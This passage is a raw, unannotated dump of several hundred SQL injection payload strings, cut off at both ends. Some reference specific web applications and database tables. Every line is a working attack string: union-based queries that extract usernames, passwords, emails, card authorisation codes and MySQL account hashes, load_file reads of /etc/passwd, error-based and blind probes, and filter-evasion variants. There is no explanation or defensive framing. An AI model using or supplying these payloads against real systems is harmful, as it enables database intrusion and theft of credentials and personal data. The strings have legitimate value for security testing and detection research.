1,/*!concat*/(username,0x3a,password),3,4,5,6 from ava_is2008.admin limit 1,1-- -123 union select 1,concat_ws(char(58),user(),database(),version()),3,4-- -123 union select 1,group_concat(username,0x3a,password),3,4,5 from pusers-- -123 union select 1,user(),3,version(),5,6-- -123 union select 1,user,password,4,5,6,7,8,9,10 from mysql.user/* -123 union select 1,version(),3,4,5,user(),7,8,9,10,11,12,13/* 123 union select concat_ws(0x3a,host,user,password),2,3,4,5,6,7,8 from mysql.user limit 0,1-- 123 union select concat_ws(0x3a,version(),database(),useR(),@@version_compile_os) -1241 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* -1242 UNION SELECT 1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11/* 1243 and 1=0 UnIon selECt 1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=0x75736572 -- -1243 union select 1,password,3,4 from mysql.user/* 124409 union select unhex(hex(concat_ws(0x3a,version(),database(),user()))),2,3,4,5,6,7/* -1244 union select 1,2,3,user(),5,6,7,8,9,10/* 1246 union select 1,2,version(),4,5-- 12476 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51-- -12488 union select 1,2,3,4,5,6,7,8,9,unhex(hex(concat_ws(0x3a,user(),version(),database()))),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from admin/* 1248 union select * from (select * from (select name_const((select concat_ws(0x2F,customers_email_address,customers_password) from customers limit 0,1),14)d) as t join (select name_const((select concat_ws(0x2F,customers_email_address,customers_password) from customers limit 0,1),14)e)b)a-- 124 and 0 union select 1,2,DATABASE(),4,5,6,7,8 -- 124' and 1=0 union select 1,2,3,4,5,6,group_concat(concat_ws(0x3a3a3a,id,login,passwd,fullname,email,group_id) separator 0x0b),8,9,10,11,12,13,14,15 from cms_users limit 0,20 -- 124 union select 1,2***** 124 union select 1,22222,3,4,5,66666,7,8,9999,10,11 limit 1,1/* -124 union select 1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17/* -124 union select 1,2,3,4,5,6,9,8,concat_ws(0x3b,version(),user(),database()),0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,42,41,43,44,45,46,47,48,49,50,52,53,52,54 -- -124 union select 1,passwd,3,4,membername,6,7,8 from smf_members/* -124 union select concat(login,0x3a,passwd) from admin 124 union select version(),database(),user(),4-- -1250' union select 1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7' -12521 union select concat_ws(0x3a,user(),version(),database(),11111111111111111111111)/* -1255' UNION SELECT 1,2,concat(nick,0x3a,pass),4,5,6,7 FROM members limit 1,1/* -1255 union select 1,2,concat_ws(0x3a,username,password,salt),4,5,6,7,8,9,0,1,2,3,4,5,6,7 from user limit 21391,1/* 1256' union select 1,version(),3,4,5,6,7,8,9,10,11 limit 1,1/* -1257 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -125823 union select 1,2,3,4,5,6,concat_ws(0x3A3a,name,pwd,userid),8,9,10,11,12,13,14,15/* -1259 UnioN SelecT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 from information_schema.tables -- 125 and 1=0 union select 1,convert(user() using cp1251),3,4,5,6,7,8 125 or 1=(select top 1 quotename(cc_auth_code ':' cc_auth_date) from orders) -- 125' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/* -125' union select 1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17/* -125 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),1,2,3,4,5,16/* 125 union select 1,2,3,4,5,6,7,8,concat_Ws(0x3a,version(),user(),database()) -125 union select 1,2,3,4,5,6,concat_ws(0x3a,database(),version(),user()),8,9,10,11,12,13,14-- -125 union select 1,2,3,4,5,6,table_name,8 from information_schema.tables limit 3111 -- -125 union select 1,2,3,4,5,user(),7,8,9,10,11,12,13,version()-- -125 union select 1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6,7,8,9,10,11,12,13-- -125 union select 1,2,3,concat_ws(char(58),version(),user(),database()),5,6,7/* -125 union select 1,2,convert(concat(version(),0x3a,user(),0x3a,database()),binary),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 -125 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14/* -125' union select 1,load_file('/etc/passwd'),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,29 from mysql.user/* 125 union select 1,version()-- -1260' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 -- -1260 union select 1,2,3,4,5,6,7,8,9,concat(version(),char(58),user()),11,12,13,14,15/* -1260 union select 1,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables -- 1261 and 1=2 union all select 1,2,concat(user,char(58),password),null,5,null,null,null,null,null,11,null,13,null from mysql.user-- -1262 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/* -1262 union select 1,concat(login,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15 from users limit 1,1/* 1267 union select 1,2,3,concat(version(),0x3a,database(),0x3a,user()),5,6 limit 1,1/* -12689 union select 1,2,3,4,5,concat_ws(0x3A3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* 126 and 1=0 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database())-- -126 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables/* -126 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,8,19,20,21,22,23,24,25,26 from users-- 126 union select 1,2,3,4,5,6,7,8,concat(version(),0x3a,database(),0x3a,user()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54 limit 1,1/* -126 union select 1,2,3,4,5,6,7,TABLE_NAME,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM INFORMATION_SCHEMA.TABLES-- -126 union select 1,2,3,4,5,6,7,@@version,9,10,11,12,13,14,15 -- -126 union select 1,2,3,4,5,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71)-- -126 union select 1,2,concat_ws(0x3a,username,0x3a,password) from users/* -126 union select 1,2,login,password,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 from users limit 1,1/* -126 union select concat(version(),0x3a,database(),0x3a,user()),2/* -1270 union select 1,CONVERT(concat_ws(0x3a,version(),user(),database()) using latin1),3,4,5/* 1271300943' and substring((select concat(version(),0x3a,username,0x3a,user_password) from f_users where username='admin' limit 0,1),1,1)=5-- -1272664800 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65 from be_users -- -1272 union select 1,2,group_concat(email,char(58)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from tvpoll1-- -1273570566 union select 1,concat_ws(0x3a,id=1,0x3a,login,0x3a,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from 2bsoft6_users Where id=1 -- -1273 and 1=2 union all select 1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database(),@@version_compile_os),0x71),0x71),5,6,7-- -1273' union select 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9 -- 12746 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 LIMIT 1,1 -1274' union select 1,2,3,4,5,version(),7,8 -- -1275 and 1=2 union select 1,2,concat_ws(char(58),version(),user(),database(),@@version_compile_os),4,5-- -1275 union select 1,unhex(hex(concat_ws(0x3a,version(),database(),user()))),3,4,5,6,7,8,9,10,11,12,13,14-- 1276 or ascii(lower(substr(version(),1,1)))=53-- -1276 union select 1,concat_ws(0x3a,Login,Password,ICQ),3,4,5,6,7,8,9,0,1,2,3,4,5,6 from puzzle_users-- 12798654333 union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12-- -1279958886 union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),load_file(0x2F6574632F706173737764) -127 and 0 union select user() from mysql.user-- -127 and 1=2 union all select aes_decrypt(aes_encrypt(concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),0x71),0x71),2,3-- -127 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from information_schema.tables -- 127 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9 -- -127 union select 1,2,3,group_concat(concat_ws(0x3a3a,login,pass,user_name,email) separator 0x0a),5,6,7,8,9,10 FROM users_table -- 127 union select 1,2,concat(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 limit 1,1 -127 union select 1,concat(login,char(58),password),3,4 from users/* -127 union select 1,group_concat(table_name),3,4,5,8,10,1,2 from information_schema.tables -- -1%27 union select 1,table_name,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 from information_schema.tables-- -127 union select concat_ws(0x0b,version(),user(),database()),2,group_concat(table_name separator 0x0b),4 from information_schema.tables where table_schema=0x6b616e6176746f5f726f6f74-- -127 union select concat_ws(0x3a,version(),user())-- 128097656 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12,13-- -128097 union select 1,2,3,4,5,6,name,8,9,email,11,12,13,14,15 from users-- 128098654389 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),19,20,21,22,23,24,25,26,27,28,29,30-- -12826 union select group_concat(table_name separator 0x3a),2,3,4,5,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=0x6872766174313831 -- -12835 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,database(),19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 -- -1284 union select 1,2,3,4,5,6,7,8,9,10,11,AES_DECRYPT(AES_ENCRYPT(concat(user(),0x3a,version()),0x73),0x73),13,14,15,16,17,18,19,20,21,22,23,24 from admin -12873 union select 1,2,3,concat_ws(0x3a3a,aid,name,email,pwd,radminsuper,user()),5,6,7,8,9,10,11,12 from nuke_authors where radminsuper=1 limit 1,1 -- 1289 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 limit 1,1/* -1289 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8/* 128 and 1=0 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,42,53,54,55 from information_schema.tables limit 43,1-- 128 and 1=0 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,42,53,54,55/* -128 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x202d20,user_name,user_id,user_password),23,24,25 from users/* -128 union select 1,2,3,user_password,5,6,7,8,9,10 from phpbb_users limit 1,15 -- -128 union select 1,2,concat_ws(0x3a3a,admin_email,username_len,pwd_len,site_root),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from sbauctions_config -- 128 ' UnIon selECt 1,2,version(),4,5,6,7,8,9,10 -- 128 union select 1,concat(user,0x3a,password) from mysql.user limit 1,1/* -128 union select 1,group_concat(CHAR(32,58,32) ,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15 from vsau.internal_users -- -12909 union select 1,2,3,4,5,6,7,8,9,10,table_name,12,13 from INFORMATION_SCHEMA.TABLES limit 7,1/* -1290 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* -1294 union select 1,concat(user(),char(58),version(),char(58),database()),3,4,5/* 1296 and 1=2 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* 12-999.9 union select 1,2,3,4,5,6,7,8,9-- 12-999.9 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database(),@@version_compile_os)-- 129 and ascii(substring((select user from site_userlist limit 4,1),1,1))>1 -129 union select 1,2,3,4,5,6,7,8-- -129 union select 1,2,3,database(),version(),user(),7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -129 Union Select 1,2,3,group_concat(username,0x3a,password,0x3a),5,6,7,8,9,10,11,12,13,14,15,16,17,18 from bee_admin-- -129' union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10-- -129 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,6,7,8,9,10,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -129' union select 1,email,password,4 from people/* 12' aNd 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,version(),24,25,26,27 -- -12 and 1=0 union select 1,2,3,4,5,6,concat(clinum,0x3a,password),8 from password-- 12 and 1=0 union select 1,2,3,4,group_concat(table_name),6,7,8 from information_schema.tables where table_schema=0x7675333030325f617065786974-- 12 and 1=0 UnIon selECt 1,2,3,4,group_concat(table_name separator 0x3c62723e),6,7,8,9,10 from information_schema.tables where table_schema=database() -- 12 and 1=0 union select 1,2,3,version()/* 12 and 1=0 UnIon selECt 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15 -- 12 and 1=0 union select concat(version(),0x3a,user(),0x3a,database())-- 12 and 1=2 union all select 1,2,3,concat(username,char(58),password),5,6,7,8 from editor-- 12 AND 1=2 UNION SELECT 0,1,2,3,group_concat(user_login,0x3a,user_pass),5 from wp_users-- -12 and 1=2 union select 1,2,3,4,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),6,7,8,9 -- 12 and 1=2 union select 1,2,3,concat_ws(0x3a,database(),user(),version())/* -12 and 1=2 union select 1,2,3,concat_ws(0x3a,login,password,email,sitename),5,6,7,8,9 from users-- 12' and(1=2) UNION SELECT 1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6/* 12 AND ascii(lower(substring(database(),1,1)))>115 -- 12 and/*ppp*/1=2 union/*ppp*/select 1318982400 12) and (substring(version(),1,1)=5 -12 or 1=1 and substring(version(),1,1)=5 12 or 1 group by concat(concat_ws(0x3a,version(),database(),user()),floor(rand(0)*2))having min(0) or 1-- (1,2)=(select*from(select name_const((select concat_ws(0x3a,version(),user())),1),name_const((select concat_ws(0x3a,version(),user())),1))a) -12 union all select 1,2,3,concat_ws(0x203a20,version(),user(),host,user,password,file_priv),5,6,7,8,9,10 from mysql.user-- 12 uNiOn all seLeCT 1,2,3,COnCat_WS(0x3a,version(),user(),database()),5,6,7,8 12 union all select concat_ws(0x3a,version(),database(),user(),2,3,4,5,6,7-- 12 union select 1,2,0xd3ffe7e2e8eceef1f2e8a0f1e0e9f2eee2,4,5,6,7,8,9,10,11/* -12' union select 1,2,3,4,5,6 /* -12 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- -12 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105 from mysql.user/* 12 union select 1,2,3,4,5,6,7,8,9,10,11,121,3,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from msysaccessobjects -12 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,version(),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 -12 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a3a,username,password,admin),19,20,21 from be_users limit 1,1 -- -12 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables -- -12 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,group_concat(table_name),16 from information_schema.tables /* -12 union select 1,2,3,4,5,6,7,8,9,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),11,12-- -12 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),database()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 -- -12 union select 1,2,3,4,5,6,7,concat_ws(0x3a,username,password),9,0,1,2,3 from percez_cal_users/* 12 union select 1,2,3,4,5,6,concat_ws(0x2a,version(),database(),user()),8,9,10 -12 union select 1,2,3,4,5,6,concat_ws(0x3a,database(),version(),user()),8,9,10,11,12-- 12' union select 1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9/* -12 UNION SELECT 1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/* -12 union select 1,2,3,4,5,concat_ws(0x3a,user()),7,8,9,10,11,12,13 from users-- 12 UNION SELECT 1,2,3,4,5,concat_ws(0x3a,Version(),database(),user()),7,8,9,10,11,12 -12' union select 1,2,3,4,5,concat_ws(0x3b,user(),database(),version()),7,8,9,10,'Mafia Of Antichat',12,13,14,15,16/* -12 union select 1,2,3,4,5,convert(concat_ws(char(58),version(),user(),database())using latin1),7/* -12 union select 1,2,3,4,5,unhex(hex(concat_ws(0x3a,version(),database(),user()))) 12 union select 1,2,3,4,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),6-- -12 union select 1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10,11,12 from trinity_users/* -12 union select 1,2,3,4,concat(username,char(58),password),6,7,8,9,10,11 from admin limit 0,1-- -12 union select 1,2,3,4,concat_ws(0x3a,user(),version(),DATABASE()),6,7,8,9,10,11,12/* -12 union select 1,2,3,4,table_name,6,7 from information_schema.tables/* -12 union select 1,2,3,4,table_name,6 from INFORMATION_SCHEMA.tables limit 0,1-- 12 union select 1,2,3,concat_ws(0x3a,version(),database(),user(),@@datadir,@@tmpdir,@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15 limit 1,1 -12 union select 1,2,3,concat_ws(char(58),version(),user(),database()),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/* -12 union select 1,2,3,database() -- 12 union select 1,2,3,u_password,5,u_id,7,8,9,10,11,12 from users -12 union select 1,2,3,user() -- -12 union select 1,2,3,version(),5,6,7,8,9/* -12 union select 1,2,CAST(concat_ws(0x3a,version(),user(),database()) AS BINARY),4/* -12 union select 1,2,concat(LoginName,char(58),Password),4,5,6,7,8,9,10,11,12,13,14,15 from Users/* -12 union select 1,2,concat(user,char(58),password),4,5,6,7,8,9,10 from mysql.user/* -12 union select 1,2,concat(user(),char(58),version()),4/* -12 union select 1,2,concat_ws(0x20203a2020,version(),user(),database()),4,5 -12 union select 1,2,concat_ws(0x20203a3a2020,user(),version(),database()),4,5/* -12 union select 1,2,concat_ws(0x20,version(),user(),database()),4,5,6,7-- -12 union select 1,2,concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,0,1/* 12 union select 1,2,concat_ws(0x3a,database(),user(),version()),4,5,6,7 -12 union select 1,2,concat_ws(0x3a,name,password),4 from mtucizone.ibf_members-- -12 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13-- 12 union select 1,2,concat_ws(0x3a,user,password),4,5 from user-- -12 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6-- -12 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4 -- -12 union select 1,2,group_concat(0x0b,admin_login,0x3a,admin_pass),4,5 from admin-- -12 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-- 12 UNION SELECT 1,2,pass,4,admin,6,nick,icq,9 from algi_users/* -12 union select 1,2,table_name,4,5,6 from information_schema.tables limit 0,1-- -12 union select 1,2,user()-- -12 union select 1,2,user,4 from usuarios-- -12 UNION select 1,2,username,4,password,6,email,homepage,9,10,11,12 from users limit 301,1 -12 union select 1,2,usr_password from tbluser -- -12 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- -12 union select 1,,3,4,5,6,7,8 -12 union select 1,concat(0x2a,user(),0x2a,database(),0x2a,version()),3,4,5,6,7,8,9,10 -12 union select 1,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),3,4-- -12 union select 1,concat(login,char(58),pass),3 from user/* -12 UNION SELECT 1,concat(user(),0x2d,database(),0x2d,version()),3,4,5,6,7,8-- 12 union select 1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8/* -12 union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4/* -12' UnIon SeleCt 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/* -12 union select 1,concat(version(),database(),user()),3,4,5,6-- -12' union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,group_concat(0x0b,table_name),6,7,8,9 from information_schema.tables-- -12 union select 1,concat_ws(0x20,user(),database(),version()),3,4,5-- -12 union select 1,concat_ws(0x3a3a,ID,LoginName,SitePassword),3,4,5,6 from loginpassword -- -12 UnIoN SeLecT 1,concat_ws(0x3a3a,USER_ID,EMAIL,LEVEL_ID,PASS),3,4,5,6 from site_user /* -12 union select 1,concat_ws(0x3a,database(),user(),version()) -12 union select 1,concat_ws(0x3a,database(),version(),user())-- -12 union select 1,concat_ws(0x3a,ID,Login,Password,ICQ),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 from alliance_users-- -12 union select 1,concat_ws(0x3a ,user(),database(),version()),3,4,5,6,7-- -12 union select 1,concat_ws(0x3a,user,password,file_priv),3,4,5,6,7,8,9,10,11,12 from mysql.user-- 12 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4 LIMIT 1,1/* -12' union select 1,database(),3,4,5,6,7,8,9,10,11,12,13 -- -12 union select 1,group_concat(0x0b,TABLE_NAME),3,4 from information_schema.tables-- -12 union select 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables-- 12 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7975726963685f677264 -- -12 union select 1,group_concat(UserName,char(58),UserPwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from users-- 12 union select 1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10 from mysql.user -- -12 union select 1,null,concat_ws(0x3a,version(),database(),user()),4,5,6,concat_ws(0x3a,name,pass),8,9,10,11 from slamchik_rap.users limit 3,7/* -12 union select 1,pass from member -- -12 union select 1,phpQid,passwd,4,5,6,7,8,9,10,11,12,13,14 from phpqadmin/* -12 union select 1,table_name,3,4,5,6,7,8,9,10 from information_schema.tables/* -12 UnIoN SeLecT 1,table_name,3,4,5,6 from information_schema.tables /* -12 union select 1,table_name,3,4 from information_schema.tables limit 22,1 -- -12 uNIon sELEct 1,u_login,3,4,5,6,7,8,9,10,11,12,13,14 from user -- -12 union select 1,user,3,4,password,6,7,8,9,10,11,12 from users 12 union select 1,user(),3,database(),version(),6,7,8,9,10,11,12 -- 12 UNION SELECT 1,username,3,4,password,6,7,8 FROM mysql.users/* -12 union select 1,version(),3,4,5,6,7,8,9,10,11,12/* -12 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15/* -12 union select concat(login,char(58),pwd) from admins/* -12 union select concat_ws(0x0b,version(),user(),database(),@@version_compile_os)-- 12 union select concat_ws(0x3a3a,version(),user(),database()),2,3 -- -12 union select concat_ws(0x3a,id,nick,name,password) from users/* -12 union select concat_ws(0x3a,id_users,login,Email,passwd),2 from users-- -12' union select concat_ws(0x3a,name,password ) from users/* -12 union select concat_ws(0x3a,version(),0x3a ,user(),@@version_compile_os),2,3-- 12 union select concat_ws(0x3A,version(),user(),database())-- -12' union select concat_ws(0x3a,version(),user(),database()),2 /* -12 union select concat_ws(char(58),user,password),2,3 from mysql.user/* -12 union select group_concat(0x0b,username,0x3a3a,password) from users-- -12 union select group_concat(column_name) from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x775f75736572 -- -12 union select null,null,null,null,null,version(),null,null,null-- -1.2 union select null,version(),null,null,null,null,null,null,null,null,null,null,null/* -12 union select unhex(hex(concat_ws(0x3a,version(),database(),user(),@@version_compile_os)))-- -12 union select username,2,3,4 from admin-- 1301 and 1=0 UNION SELECT 1,2,version(),4,5,6 -- 1301 UNION SELECT 1,2,CONCAT(user(),0x2D,version(),0x2D,database()),4,5,6,7,8,9,10,11,12,13,14,15-- -1301 union select 1,concat_ws(0x3a ,user(),database(),version()),3,4,5-- -13033 union select 1,2,3,4,concat_ws(char(58),version(),user(),database()),6 from news -- 1303' union select 1,2,3,4,5,6,7/ -1304 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a3a,version(),user(),database()),10,11 1304 union select 1,2,@@version,4,5,6,7,8,9,0,11,12-- -13053 union select null,null,null,null,null,null,null,null,version()||':'||current_user,null,null,null,null,null,null,null,null,null,null,null,null-- 1306 and (select substring(version(),1,1))=5 1307543520 and (SELECT substring(concat(1,password),1,1) from bak_users limit 0,1)=1 13078 union select 1,2,3,4,@@version,6,7,8,9-- -130805 union select 1,concat_ws(0x2a2a2a,version(),user(),database()) 130 and 0 union select 1,2,3,4,5,concat_ws(0x3a,name,passwd),7,8 from user limit 0,1 -- 130' and 1=0 union select 1,2,3,4,5,6,7,group_concat(email,0x3a,password),9,10,11,12 from users-- -130 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14-- -130 union select 1,2,3,4,version(),6,database(),8,user(),10,11,12,13,14,15,16,17,18,19,20,21-- -130 union select 1,2,3,4,version(),user(),7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21/* -130 union select 1,2,3,version(),5-- -130 union select 1,2,concat(database(),0x3a,version(),0x3a,user()),4,5,6,7,8,9,10,1 -130 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -130 union select 1,concat(table_name,0x3a,column_name),3,4 from information_schema.columns/* -130' union select 1,concat_ws(0x3a,login,password,email) from user limit 1,1/* -130 UNION SELECT 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6 -130 union select concat_ws(0x3a,username) from users limit 0,1/* -13116 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user())-- 131265 uNiOn sElEct 1,concat_ws(0x3a3a,VCH_login,VCH_password),3 from rc_usuarios -- 131269 and 1=0 union select 1,concat(@i:=0x00,@o:=0x0d0a,benchmark(1500,@o:=CONCAT(@o,0x0d0a,(SELECTconcat(@i:=customers_password)frombomondlg_bomondshop.customersWHEREcustomers_password>@iorderbycustomers_passwordLIMIT1))),@o) -1312 union select 1,2,3,4,5,database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55-- 1313 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 13-13 UNION SELECT concat_ws(0x3a,login,password) FROM polihim.access-- -13168 Union select 1,2,3,version(),5,6,7,8,9,10,11,12 -1317 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/* -13199 union select 1,2,fld_password,4,5,6 from tbl_admin-- -1319 union select 